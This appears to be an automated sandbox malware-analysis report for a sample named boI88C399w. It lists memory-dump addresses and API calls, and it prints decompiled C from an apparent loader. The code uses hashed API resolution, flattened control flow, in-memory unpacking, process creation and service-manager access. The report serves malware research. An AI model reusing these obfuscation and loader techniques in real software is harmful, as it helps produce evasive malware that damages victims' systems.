0x0046014d
0x00460150
0x00460153
0x00460156
0x0046015c
0x00460162
0x00460169
0x0046016c
0x00460173
0x00460176
0x00460189
0x00460195
0x004601a1
0x004601a8
0x004601ac
0x004601b3
0x004601b6
0x004601c1
0x004601c9
0x004601de
0x004601e0
0x004601e9
0x004601eb
0x004601ee
0x004601fb
0x004601fe
0x00460211
0x00460216
0x00460200
0x00460201
0x00460203
0x00460208
0x00460208
0x00460201
0x0046021e
0x00460223
0x00460226
0x0046022e
0x00460235
0x0046023c
0x00460245
0x0046024a
0x0046024f
0x00460256
0x0046025d
0x00460266
0x00460270
0x00460277
0x0046027e
0x0046027e
0x00460266
0x00460284
0x00460288
0x0046028d
0x00460293
0x0046029f
0x004602a2
0x004602a9
0x004602ab
0x004602b1
0x004602bb
0x004602c0
0x004602c6
0x004602d4
0x004602dc
0x004602df
0x004602df
0x004602ec
0x004602ee
0x004602f1
0x004602f1
0x00460301
0x00460308
0x0046030b
0x00460312
0x00460315
0x00460328
0x00460334
0x00460343
0x00460351
0x00460356
0x0046035c
0x0046036b
0x00460375
0x0046037a
0x0046039a
0x004603a3
0x004603a9

APIs

Part of subcall function 00461200: __vbaVarVargNofree.MSVBVM60(?), ref: 00461213
Part of subcall function 00461200: __vbaI4Var.MSVBVM60(00000000), ref: 0046121A

__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00460195
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 004601E0
__vbaVarTstEq.MSVBVM60(?,?,00001BBC), ref: 0046023C
__vbaVarTstEq.MSVBVM60(00008002,?), ref: 0046025D
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0046027E
__vbaSetSystemError.MSVBVM60(?), ref: 00460293
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00001C21), ref: 004602C6
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00460334
__vbaSetSystemError.MSVBVM60(?,?,00000004), ref: 0046035C
__vbaSetSystemError.MSVBVM60(?,?,00000001), ref: 0046037A
__vbaFreeStr.MSVBVM60(004603AA), ref: 0046039A
__vbaFreeVar.MSVBVM60 ref: 004603A3

Memory Dump Source

Source File: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$ErrorSystem$List$NofreeVarg
String ID:
API String ID: 2843042663-0
Opcode ID: 8bf4782b0721e7912ed263c6428548b3aab0b6a63dd0c2220260721af6c2ebdd
Instruction ID: d250081d480ee47ecd5c83b5c8dcdeb620c81584f07dbc88b1cecd4a35cf7b9b
Opcode Fuzzy Hash: 8bf4782b0721e7912ed263c6428548b3aab0b6a63dd0c2220260721af6c2ebdd
Instruction Fuzzy Hash: 2A7119B0D002189BDB10DFA5DC89AEEBBB8BF44348F10416EE509B7251EB785989CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02CB0990, Relevance: 9.1, APIs: 6, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 02CB0B88
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 02CB0BBA
Part of subcall function 02CB0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 02CB0BFB

VirtualAlloc.KERNEL32(?,?,00000000), ref: 02CB09E6
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CB09F5

Part of subcall function 02CB0D00: lstrcpynW.KERNEL32(?,00000000,00000000,00000010,02CB0B7D,00000000), ref: 02CB0D15

RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 02CB0A26
VirtualAlloc.KERNEL32(?,?,00000000), ref: 02CB0A41
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CB0A6E
RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 02CB0A8B

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: Memory$Move$AllocVirtual$Filllstrcpyn
String ID:
API String ID: 3581289920-0
Opcode ID: 449b69f8a763e67152e7b53cd49144c3446f3476cce69b159e67f55379084994
Instruction ID: 83b98d588be9812b51e5ebd2ae247dbcb62dfac52a329c39fa6e99234e8a4a2b
Opcode Fuzzy Hash: 449b69f8a763e67152e7b53cd49144c3446f3476cce69b159e67f55379084994
Instruction Fuzzy Hash: 17313C716083446FD765DB28C890FABB3EAEFC9714F10492CB548E7280D774E909CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00463F60, Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaStrCopy.MSVBVM60 ref: 00463F9E
#608.MSVBVM60(?), ref: 00463FD0
__vbaVarCat.MSVBVM60(?,?,00000008), ref: 00463FE2
__vbaStrVarMove.MSVBVM60(00000000), ref: 00463FE9
__vbaStrMove.MSVBVM60 ref: 00463FF6
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00464002

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Move$#608CopyFreeList
String ID:
API String ID: 2162788001-0
Opcode ID: 1af26e0a2c13347b8656cab7b4b070301e81dfe1824373bc2389ca1b264d1a34
Instruction ID: 0446e51bb39f8185eadd46b405e82934574322e72cf6cd110fe019cfba87f342
Opcode Fuzzy Hash: 1af26e0a2c13347b8656cab7b4b070301e81dfe1824373bc2389ca1b264d1a34
Instruction Fuzzy Hash: AA1196B1900218AFCB14DF94DE89BEE77B8FB48705F208026F505B3250E6786E058B6A

Uniqueness

Uniqueness Score: -1.00%

Function 02CC30D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E02CC30D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
								_t52 = 0x27153269;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
								continue;
							} else {
								if(_t52 == 0x27153269) {
									_t85 =  *0x2ccddd0;
									if(_t85 == 0) {
										_t85 = E02CC3E80(_t76, E02CC3F20(0x7539f5a2), 0xf789cbad, _t102);
										 *0x2ccddd0 = _t85;
									}
									_t95 =  *_t85(_t102 + 0x2c);
									_t52 = 0xb58c94f;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t52 != 0x302165a1) {
										goto L20;
									} else {
										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
										continue;
									}
								}
							}
							L30:
						}
						if(_t104 == 0) {
							if(_t76 !=  *(_t103 + 0x10)) {
								goto L29;
							} else {
								_t52 = 0x7338f4f;
								goto L2;
							}
						} else {
							if(_t52 == 0x26fef4f) {
								_t90 =  *0x2cce25c;
								if(_t90 == 0) {
									_t90 = E02CC3E80(_t76, E02CC3F20(0xbb398380), 0x5b27858b, _t102);
									 *0x2cce25c = _t90;
								}
								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
								 *(_t77 + 0x1c) = _t100;
								goto L29;
							} else {
								if(_t52 == 0x7338f4f) {
									_t68 =  *0x2ccdea8;
									if(_t68 == 0) {
										_t68 = E02CC3E80(_t76, E02CC3F20(0xbb398380), 0x97f883e, _t102);
										 *0x2ccdea8 = _t68;
									}
									_t101 =  *_t68();
									if( *0x2ccdcec == 0) {
										 *0x2ccdcec = E02CC3E80(_t76, E02CC3F20(0xbb398380), 0xe9233692, _t102);
									}
									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
									_t100 = _t71;
									if(_t100 == 0) {
										L29:
										return 1;
									} else {
										_t52 = 0x26fef4f;
										goto L1;
									}
								} else {
									if(_t52 != 0xb58c94f) {
										goto L20;
									} else {
										_t76 = E02CC3D10(_t95);
										_t52 = 0x302165a1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L30;
						L20:
					} while (_t52 != 0x2c4ed872);
					return 1;
					goto L30;
				}
			}

0x02cc30d2
0x02cc30d6
0x02cc30dc
0x02cc30e1
0x02cc30e6
0x02cc30ea
0x02cc30ea
0x02cc30f0
0x02cc30f0
0x02cc30f0
0x02cc30f0
0x02cc30f5
0x00000000
0x00000000
0x02cc31b1
0x02cc3226
0x02cc322e
0x02cc3233
0x02cc323b
0x02cc3240
0x02cc3248
0x02cc324d
0x02cc3255
0x02cc325a
0x02cc3262
0x02cc326a
0x02cc326f
0x02cc327c
0x02cc3280
0x02cc3285
0x02cc328d
0x02cc3292
0x02cc329f
0x02cc32a3
0x02cc32a8
0x00000000
0x02cc31b3
0x02cc31b8
0x02cc31ec
0x02cc31f4
0x02cc320c
0x02cc320e
0x02cc320e
0x02cc321a
0x02cc321c
0x02cc30ea
0x02cc30ea
0x00000000
0x02cc30ea
0x02cc31ba
0x02cc31bf
0x00000000
0x02cc31c1
0x02cc31cc
0x00000000
0x02cc31cc
0x02cc31bf
0x02cc31b8
0x00000000
0x02cc31b1
0x02cc30fb
0x02cc319c
0x00000000
0x02cc31a2
0x02cc31a2
0x00000000
0x02cc31a2
0x02cc3101
0x02cc3106
0x02cc32b5
0x02cc32bd
0x02cc32d5
0x02cc32d7
0x02cc32d7
0x02cc32ee
0x02cc32f0
0x02cc32f7
0x02cc32fd
0x02cc3300
0x00000000
0x02cc310c
0x02cc3111
0x02cc312e
0x02cc3135
0x02cc3148
0x02cc314d
0x02cc314d
0x02cc3154
0x02cc315d
0x02cc3175
0x02cc3175
0x02cc3182
0x02cc3184
0x02cc3188
0x02cc3306
0x02cc330d
0x02cc318e
0x02cc318e
0x00000000
0x02cc318e
0x02cc3113
0x02cc3118
0x00000000
0x02cc311e
0x02cc3125
0x02cc3127
0x02cc30ea
0x02cc30ea
0x00000000
0x02cc30ea
0x02cc30ea
0x02cc3118
0x02cc3111
0x02cc3106
0x00000000
0x02cc31d4
0x02cc31d4
0x02cc31e9
0x00000000
0x02cc31e9

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02CC3182

Strings

&, xrefs: 02CC328D
S=, xrefs: 02CC3226
B, xrefs: 02CC3262

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &$B$S=
API String ID: 1279760036-3580750612
Opcode ID: c8978cd46f0f95d95fefeb292e8d3878e6908652f10f2ba02b9feedddb297ae9
Instruction ID: 1280081690028b3f9e91d7c119c265a75f352e802e9bea92bad0223427c680f7
Opcode Fuzzy Hash: c8978cd46f0f95d95fefeb292e8d3878e6908652f10f2ba02b9feedddb297ae9
Instruction Fuzzy Hash: E351F772A043829BCB18DE28A48465BB7E6FBD4354F308D9EF046C7350DB71DA468BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00464040, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00464040(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v40;
				char _t9;
				intOrPtr _t11;
				void* _t12;
				intOrPtr* _t18;
				char _t20;
				void* _t22;
				void* _t24;
				intOrPtr _t25;

				_t25 = _t24 - 8;
				_t9 =  *[fs:0x0];
				 *[fs:0x0] = _t25;
				_v12 = _t25 - 0x1c;
				_v8 = 0x401c18;
				_v40 = 0;
				E00408FB8(); // executed
				_t18 = __imp____vbaSetSystemError;
				_t20 = _t9;
				 *_t18(0, 0x104, __edi, __esi, __ebx, _t9, 0x401e96, _t22);
				_t11 = _a4;
				_v24 = _t20;
				__imp____vbaI4Var( &_v40, _t11, _t20, 0x104);
				E00409130();
				_t12 =  *_t18(_t11);
				if(_t11 == 0) {
					_v24 = 0;
				}
				__imp____vbaFreeVar(0x4640ba);
				return _t12;
			}

0x00464043
0x0046404b
0x00464052
0x0046405f
0x00464062
0x00464071
0x00464074
0x00464079
0x0046407f
0x00464081
0x00464083
0x00464091
0x00464094
0x0046409b
0x004640a2
0x004640a6
0x004640a8
0x004640a8
0x004640b3
0x004640b9

APIs

__vbaSetSystemError.MSVBVM60(00000000,00000104,00001BBC,?,00000000,?,?,?,?,?,00000000,00401E96,00460223), ref: 00464081
__vbaI4Var.MSVBVM60(?,00460223,00000000,00000104,?,?,?,?,?,00000000,00401E96,00460223), ref: 00464094
__vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,00000000,00401E96,00460223), ref: 004640A2
__vbaFreeVar.MSVBVM60(004640BA,?,?,?,?,?,00000000,00401E96,00460223), ref: 004640B3

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$ErrorSystem$Free
String ID:
API String ID: 1781937261-0
Opcode ID: c01dc994a0a739ecd51f52aee193ee5c7406b93a62dcd4c208bed1faa30cffda
Instruction ID: 0a47f4db27ceef6a2f6c12d1942b72a461525ab0b57ba9bb390f18552c8e3d96
Opcode Fuzzy Hash: c01dc994a0a739ecd51f52aee193ee5c7406b93a62dcd4c208bed1faa30cffda
Instruction Fuzzy Hash: 140186B1D40318ABCB00EFA48E85A9EBBBCEB48744F10007AF641B7291D6785E408BE5

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4BA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E02CC4BA0(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x2cce234;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E02CC3E80(__ebx, E02CC3F20(0xe66945e6), 0x8d9b356, __ebp);
					 *0x2cce234 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x2ccde64 == 0) {
					 *0x2ccde64 = E02CC3E80(_t26, E02CC3F20(0xbb398380), 0xcbbf9e7f, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x2ccdc70;
						if(_t15 == 0) {
							_t15 = E02CC3E80(_t26, E02CC3F20(0xbb398380), 0x560d239b, _t46);
							 *0x2ccdc70 = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x2ccdc70;
						if(_t17 == 0) {
							_t17 = E02CC3E80(_t26, E02CC3F20(0xbb398380), 0x560d239b, _t46);
							 *0x2ccdc70 = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x02cc4ba0
0x02cc4ba0
0x02cc4ba0
0x02cc4ba9
0x02cc4bac
0x02cc4bb0
0x02cc4bc3
0x02cc4bc8
0x02cc4bc8
0x02cc4bd6
0x02cc4be0
0x02cc4bea
0x02cc4c02
0x02cc4c02
0x02cc4c21
0x02cc4c25
0x02cc4caa
0x02cc4c27
0x02cc4c2d
0x02cc4c44
0x02cc4c4b
0x02cc4c5e
0x02cc4c63
0x02cc4c63
0x02cc4c6c
0x02cc4c6e
0x02cc4c75
0x02cc4c88
0x02cc4c8d
0x02cc4c8d
0x02cc4c96
0x02cc4ca2
0x02cc4c2f
0x02cc4c2f
0x02cc4c35
0x02cc4c43
0x02cc4c43
0x02cc4c2d

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02CC4C21

Strings

D, xrefs: 02CC4BE0
Ei, xrefs: 02CC4BB2

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D$Ei
API String ID: 963392458-592548167
Opcode ID: 7dce53a3bebb538dce93fd819f23cc6fba5029b462e1df5d6b9898a8e6ab37c7
Instruction ID: 0b617e15fb833afc6703dd5b7ae8a0ae17327eb994d39d8ffbf7d5bb8a6d13eb
Opcode Fuzzy Hash: 7dce53a3bebb538dce93fd819f23cc6fba5029b462e1df5d6b9898a8e6ab37c7
Instruction Fuzzy Hash: A8212771B007816BE714EB78EC60BAB37A3ABC0740F20896CF545CB290EF70C9058B92

Uniqueness

Uniqueness Score: -1.00%

Function 02CC96B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E02CC96B0() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* _t44;
				void* _t47;
				void* _t51;
				void* _t62;
				void* _t66;
				void* _t69;
				intOrPtr _t79;
				void* _t90;
				signed int _t103;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;

				_t117 = _v528;
				_t44 = 0x290b7473;
				_t116 = 0;
				_t2 = _t116 + 1; // 0x1
				_t79 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t121 = _t44 - 0x185037e0;
						if(_t121 > 0) {
							break;
						}
						if(_t121 == 0) {
							_v528 = 0x9fb;
							_v528 = _v528 ^ 0xe4a1a680;
							_v528 = _v528 << 0xd;
							_v528 = _v528 + 0xffffacfd;
							_t80 = _v528;
							_t44 = 0xac9ce62;
							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
							_v528 = _v528 << 5;
							_v528 = _v528 ^ 0x3febe949;
							continue;
						} else {
							_t122 = _t44 - 0xac9ce62;
							if(_t122 > 0) {
								__eflags = _t44 - 0x143d843a;
								if(_t44 != 0x143d843a) {
									goto L32;
								} else {
									E02CC7AB0(_t118);
									_t44 = 0x28458a2;
									continue;
								}
							} else {
								if(_t122 == 0) {
									_t66 =  *0x2ccddb8;
									__eflags = _t66;
									if(_t66 == 0) {
										_t66 = E02CC3E80(_t79, E02CC3F20(0x667fdee), 0x505cb3fe, _t118);
										 *0x2ccddb8 = _t66;
									}
									 *_t66(_t117);
									_t44 = 0x67ba340;
									continue;
								} else {
									if(_t44 == 0x28458a2) {
										_t69 =  *0x2ccde58;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E02CC3E80(_t79, E02CC3F20(0xbb398380), 0xb1aefb5, _t118);
											 *0x2ccde58 = _t69;
										}
										 *_t69(0,  &_v524, 0x104);
										 *((intOrPtr*)( *0x2cce2ec + 0x48)) = E02CC3D10( &_v536);
										_t44 = 0x311c267c;
										continue;
									} else {
										if(_t44 != 0x67ba340) {
											goto L32;
										} else {
											_t90 =  *0x2ccdf38;
											if(_t90 == 0) {
												_t90 = E02CC3E80(_t79, E02CC3F20(0xf9c30097), 0x62c574d8, _t118);
												 *0x2ccdf38 = _t90;
											}
											 *_t90(0, _v528, 0, 0,  *0x2cce2ec + 0x5c); // executed
											_t44 = 0x143d843a;
											_t116 =  ==  ? _t79 : _t116;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					__eflags = _t44 - 0x311c267c;
					if(__eflags > 0) {
						__eflags = _t44 - 0x37104f21;
						if(_t44 != 0x37104f21) {
							goto L32;
						} else {
							__eflags =  *0x2cce0f4;
							if( *0x2cce0f4 == 0) {
								 *0x2cce0f4 = E02CC3E80(_t79, E02CC3F20(0x667fdee), 0x7f692adf, _t118);
							}
							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t117 = _t47;
							__eflags = _t117;
							if(_t117 == 0) {
								_t44 = 0x25965b99;
							} else {
								 *((intOrPtr*)( *0x2cce2ec + 0x268)) = _t79;
								_t44 = 0x185037e0;
							}
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 =  *0x2ccdf38;
							__eflags = _t51;
							if(_t51 == 0) {
								_t51 = E02CC3E80(_t79, E02CC3F20(0xf9c30097), 0x62c574d8, _t118);
								 *0x2ccdf38 = _t51;
							}
							 *_t51(0, 0x25, 0, 0,  &_v524); // executed
							__eflags =  *0x2cce2ec + 0x10;
							E02CC3070( *0x2cce2ec + 0x10);
							goto L37;
						} else {
							__eflags = _t44 - 0x25965b99;
							if(_t44 == 0x25965b99) {
								_v528 = 0x4b7f;
								_v528 = _v528 + 0xffffece0;
								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
								_v528 = _t103;
								_v528 = (_t103 << 5) + _v528;
								_v528 = _v528 >> 2;
								_v528 = _v528 ^ 0x000008d8;
								 *((intOrPtr*)( *0x2cce2ec + 0x3c)) = 0x2cc7c60;
								_t44 = 0x67ba340;
								goto L1;
							} else {
								__eflags = _t44 - 0x290b7473;
								if(_t44 != 0x290b7473) {
									goto L32;
								} else {
									_t62 = E02CC42F0(_t79, 0x480);
									 *0x2cce2ec = _t62;
									__eflags = _t62;
									if(_t62 == 0) {
										L37:
										return _t116;
									} else {
										 *((intOrPtr*)(_t62 + 0x38)) = E02CC7C70;
										_t44 = 0x37104f21;
										goto L1;
									}
								}
							}
						}
					}
					goto L38;
					L32:
					__eflags = _t44 - 0x20400186;
				} while (_t44 != 0x20400186);
				return _t116;
				goto L38;
			}

0x02cc96b8
0x02cc96bc
0x02cc96c2
0x02cc96c4
0x02cc96c4
0x02cc96c7
0x02cc96d0
0x02cc96d0
0x02cc96d0
0x02cc96d0
0x02cc96d5
0x00000000
0x00000000
0x02cc96db
0x02cc97e7
0x02cc97f4
0x02cc97fc
0x02cc9801
0x02cc9809
0x02cc980f
0x02cc981d
0x02cc9821
0x02cc9826
0x00000000
0x02cc96e1
0x02cc96e1
0x02cc96e6
0x02cc97cd
0x02cc97d2
0x00000000
0x02cc97d8
0x02cc97d8
0x02cc97dd
0x00000000
0x02cc97dd
0x02cc96ec
0x02cc96ec
0x02cc979c
0x02cc97a1
0x02cc97a3
0x02cc97b6
0x02cc97bb
0x02cc97bb
0x02cc97c1
0x02cc97c3
0x00000000
0x02cc96f2
0x02cc96f7
0x02cc974e
0x02cc9753
0x02cc9755
0x02cc9768
0x02cc976d
0x02cc976d
0x02cc977e
0x02cc978f
0x02cc9792
0x00000000
0x02cc96f9
0x02cc96fe
0x00000000
0x02cc9704
0x02cc9704
0x02cc970c
0x02cc9724
0x02cc9726
0x02cc9726
0x02cc9740
0x02cc9744
0x02cc9749
0x00000000
0x02cc9749
0x02cc96fe
0x02cc96f7
0x02cc96ec
0x02cc96e6
0x00000000
0x02cc96db
0x02cc9833
0x02cc9838
0x02cc98d6
0x02cc98db
0x00000000
0x02cc98dd
0x02cc98e2
0x02cc98e4
0x02cc98fc
0x02cc98fc
0x02cc990a
0x02cc990c
0x02cc990e
0x02cc9910
0x02cc9927
0x02cc9912
0x02cc9917
0x02cc991d
0x02cc991d
0x00000000
0x02cc9910
0x02cc983e
0x02cc983e
0x02cc9948
0x02cc994d
0x02cc994f
0x02cc9962
0x02cc9967
0x02cc9967
0x02cc9979
0x02cc9984
0x02cc9988
0x00000000
0x02cc9844
0x02cc9844
0x02cc9849
0x02cc987e
0x02cc988b
0x02cc989f
0x02cc98a2
0x02cc98af
0x02cc98b3
0x02cc98b8
0x02cc98c5
0x02cc98cc
0x00000000
0x02cc984b
0x02cc984b
0x02cc9850
0x00000000
0x02cc9856
0x02cc985b
0x02cc9860
0x02cc9865
0x02cc9867
0x02cc9990
0x02cc999b
0x02cc986d
0x02cc986d
0x02cc9874
0x00000000
0x02cc9874
0x02cc9867
0x02cc9850
0x02cc9849
0x02cc983e
0x00000000
0x02cc9931
0x02cc9931
0x02cc9931
0x02cc9947
0x00000000

APIs

OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,2564BE4F), ref: 02CC990A

Strings

I?, xrefs: 02CC9826

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

